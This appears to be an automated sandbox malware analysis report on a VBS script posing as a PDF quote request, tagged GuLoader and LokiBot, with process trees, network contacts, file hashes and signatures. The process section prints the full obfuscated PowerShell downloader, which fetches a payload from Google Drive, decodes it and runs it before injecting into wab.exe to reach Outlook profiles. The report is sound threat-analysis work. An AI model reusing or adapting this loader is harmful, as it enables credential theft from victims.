Malware Analysis Report

2025-05-06 00:00

Sample ID 240321-vmzqxscg24
Target Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
SHA256 18a00a0da74be3d89a29bd856617a1703ee83646f39a51d70cf9d9017bd1ffad
Tags
guloader lokibot collection downloader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

18a00a0da74be3d89a29bd856617a1703ee83646f39a51d70cf9d9017bd1ffad

Threat Level: Known bad

The file Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection downloader spyware stealer trojan

Guloader,Cloudeye

Lokibot

Checks computer location settings

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

outlook_office_path

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

outlook_win_path

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-21 17:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-21 17:07

Reported

2024-03-21 17:09

Platform

win7-20240221-en

Max time kernel

146s

Max time network

123s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2076 set thread context of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 1712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1968 wrote to memory of 1712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1968 wrote to memory of 1712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 2360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1712 wrote to memory of 2360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1712 wrote to memory of 2360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1712 wrote to memory of 2076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 2076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 2076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 2076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2076 wrote to memory of 928 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 928 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 928 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 928 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2076 wrote to memory of 900 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
NL 142.250.179.142:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
NL 142.250.179.142:443 drive.google.com tcp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

MD5 25ce7b393f49c7c35fc9bda0bc9fb915
SHA1 40038b21a508106fa528d4be80e5c67094014502
SHA256 59f4a91d276667fc04bf0021882e310d0ec64daf827df1cb987ebaf9b858d3de
SHA512 bc43eb4c04da3106f21a37d637337a0233bbf65419a4c528fe9cfe82db52a6b85f7d99a966a0564d399a2de8c2bf75f4a4bdf83ed5e00958c5ba7a90881e5014

C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

MD5 074dc4bc79f77cda3cbd467980d6ed1d
SHA1 3ec35f6d8859aae74969093551aaa8a426b20844
SHA256 6ae66e8a1cfe1b489fa6165350027a6d2e4bf3ac87d49fc66d6a43de2bcd7fde
SHA512 6d8e44d82e817e87a4d43b9625555beb77a465e07c575dca131e628ebfddd9ad657eb57c50d86cfee98beff1ba97dd8da9515347cdedb6998d6ef78cda812826

C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

MD5 6a865d731fc3f1c152f884e5e1df9588
SHA1 4cfb4908e6548a350d7d14639507a21a54a212e2
SHA256 f12e0eebbf69e71d91e8f9ed17fd5f225520c58b61f3de7116de60668f9e7fe2
SHA512 61e27ff3686179f45ad0e06e1875c2fc3ec5973cf7ed248936e09471d2eb427c26c00ef6dc5a78e7e831460508ffb8563a5807bfd3f2bc444498e168d34bc666

C:\Users\Admin\AppData\Local\Temp\Overpronounced.txt

MD5 50dd413bec30f0e90580cab4ead43871
SHA1 9323a2fffa9292219b75a826390a4b9a92ddc9c5
SHA256 910062babe14c2a8f72bbd65eb2424b7f5eb62d12722b4aa32985d07ff4a4ddf
SHA512 9deae5305ab9a902511696acf882c9c29d968de6c25607dfb86151ebeb2a8ffe8049cba10ed9723f0521bc88df72aa1e597501779ffc14a82c9b0918ca549190

memory/1712-266-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/1712-267-0x0000000002360000-0x0000000002368000-memory.dmp

memory/1712-268-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/1712-269-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/1712-270-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/1712-271-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/1712-272-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/1712-273-0x0000000002C30000-0x0000000002C52000-memory.dmp

memory/1712-274-0x0000000002A40000-0x0000000002A52000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YL3K1WDEVXVYMXV84ERM.temp

MD5 4a286405fae162fb819820012bd51389
SHA1 66db4e7cfc28b332a662a14e1667a282117f04ba
SHA256 3bb59c15eb5b5328861b21d52ab388678d2b405e4e75c6ef061a5c4148b3494c
SHA512 b8617f2dafff8ce9e1a25cf71a459523706092ca653a534222070c55894266a4607abe395d1784bebbdbf01f19f624e188a35c6e8d25c39eef79efa30fa33c19

memory/2076-277-0x0000000072EA0000-0x000000007344B000-memory.dmp

memory/2076-278-0x0000000002530000-0x0000000002570000-memory.dmp

memory/2076-279-0x0000000072EA0000-0x000000007344B000-memory.dmp

memory/2076-280-0x0000000002530000-0x0000000002570000-memory.dmp

memory/2076-290-0x0000000002530000-0x0000000002570000-memory.dmp

memory/1712-291-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

memory/2076-292-0x0000000005680000-0x0000000005681000-memory.dmp

memory/2076-293-0x0000000006670000-0x000000000AA48000-memory.dmp

memory/1712-294-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/1712-295-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/1712-296-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/1712-297-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2076-298-0x0000000072EA0000-0x000000007344B000-memory.dmp

memory/2076-299-0x0000000076E60000-0x0000000077009000-memory.dmp

memory/2076-300-0x0000000002530000-0x0000000002570000-memory.dmp

memory/2076-301-0x0000000077050000-0x0000000077126000-memory.dmp

memory/900-302-0x0000000076E60000-0x0000000077009000-memory.dmp

memory/900-304-0x0000000077050000-0x0000000077126000-memory.dmp

memory/900-305-0x0000000077086000-0x0000000077087000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 041f23af7d4457cc0ad5615db4d8d411
SHA1 59f348256c70326a68a5a0e8139ca540da6deb4c
